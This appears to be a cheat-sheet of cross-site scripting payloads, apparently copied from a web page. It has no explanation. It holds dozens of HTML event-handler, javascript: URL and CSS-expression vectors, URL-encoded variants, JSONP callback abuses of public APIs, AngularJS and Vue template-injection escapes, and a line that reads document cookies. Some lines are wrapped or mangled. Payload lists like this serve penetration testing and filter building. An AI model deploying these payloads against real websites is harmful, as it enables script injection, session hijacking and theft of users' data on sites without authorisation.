<frameset onload="alert('XSS')"></frameset>
<applet code="javascript:alert('XSS')"></applet>
<div oncopy="alert('XSS')">Copy me</div>
<form onsubmit="alert('XSS')">
<select onchange="alert('XSS')"><option>Option</option></select>
<input type="image" src="invalid" onerror="alert('XSS')">
<div style="border-image-source: url(javascript:alert('XSS'));">
<datalist id="xss"><option
value="&lt;script&gt;alert('XSS')&lt;/script&gt;"></datalist>
<meter value=" " min=" " max=" " low=" " high=" "
onmouseover="alert('XSS')"></meter>
<optgroup label="XSS" onmouseenter="alert('XSS')"></optgroup>
<progress onmouseover="alert('XSS')"></progress>
<track oncuechange="alert('XSS')"></track>
<link rel="stylesheet"
href="data:text/css,*{background:url('javascript:alert(XSS)')}">
<div style="list-style-image: url(javascript:alert('XSS'));">
<div data-url="javascript:alert('XSS')"></div>
<div style="content: url(javascript:alert('XSS'));">
<style>*{background-image: url(javascript:alert('XSS'))}</style>
<div style="cursor: url(javascript:alert('XSS')), auto;">
<meta http-equiv="refresh" content=" ; url=javascript:alert('XSS');">
<input type="button" value="XSS" onclick="alert('XSS')">
<svg><animate attributeName="xlink:href" to="javascript:alert('XSS')" /></svg>
<math href="javascript:alert('XSS')" />
<xss style="x:expression(alert('XSS'))">
<form action="javascript:alert('XSS')"><input type="submit" value="XSS"></form>
<div style="width:expression(alert('XSS'))">
"<zzz><style>@keyframes+x+{}</style><xss+style="animation-Name:
+x"+onwebkitanimationstart="print()"></xss>
<script>eval('\x61lert(\'33\')')</script>
<script>\u0061lert('22')</script>
<marquee onstart="alert('XSS')">Start</marquee>
<style>@import 'javascript:alert(XSS)';</style>
<link rel="import" href="data:text/html,<script>alert('XSS')</script>">
<div onkeyup="alert('XSS')">Press a key</div>
<input onblur="alert('XSS')" value="Blur me">
%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E
%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C
%2Fiframe%3E
%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C
%2Fscript%3E%22%3E
%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E
%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C
%2Fdiv%3E
%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20ME%3C%2Fbutton%3E
%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type
%3Dsubmit%3E%3C%2Fform%3E
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert
%28%2FXSS%2F%29%22%3E
%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E
%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E
ddd");</script><script>alert("XSS");</script><script>aaa("
%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E
%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E
%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type
%3Dsubmit%3E%3C%2Fform%3E
%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E
%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C
%2Fiframe%3E
console.log(document.domain)
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></
script>
<script src="https://api.bing.com/osjson.aspx?
query=x&JsonType=callback&JsonCallback=alert"></script>
<script src="https://api.dailymotion.com/video/x5gv6be?callback=alert()"></script>
javaScRipt:Alert(‘1’)
{{constructor.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getProtot
ypeOf(a.sub),a).value,0,'alert(1)')()}}
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]
['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}
[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]
['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]
['y'].value('alert(1)')()
onerror="x='ale';z='r';y='t';p='`XSS`';new constructor.constructor`zzz${`${x}${z}$
{y}${p}`}bbb`
"on{{click=prompt(document['cookie'])/*}}*/>
<video src=x onerror="prompt(xss">
Hh'><script>alert(1)</script>
<video src=x onerror="prompt(xss)">
<x @[_b.constructor`alert(1)`()]>
<x #[_c.constructor`alert(1)`()]>
<svg onload=prompt&#x000000028;document.domain)>
<video src=x onerror1="prompt(xss)">
Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee>
["');alert('1’);//"]@xyz.xxx
["');alert('XSS');//"]@xyz.xxx
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
<div v-html="''.constructor.constructor('alert(1)')()">a</div>

You might also like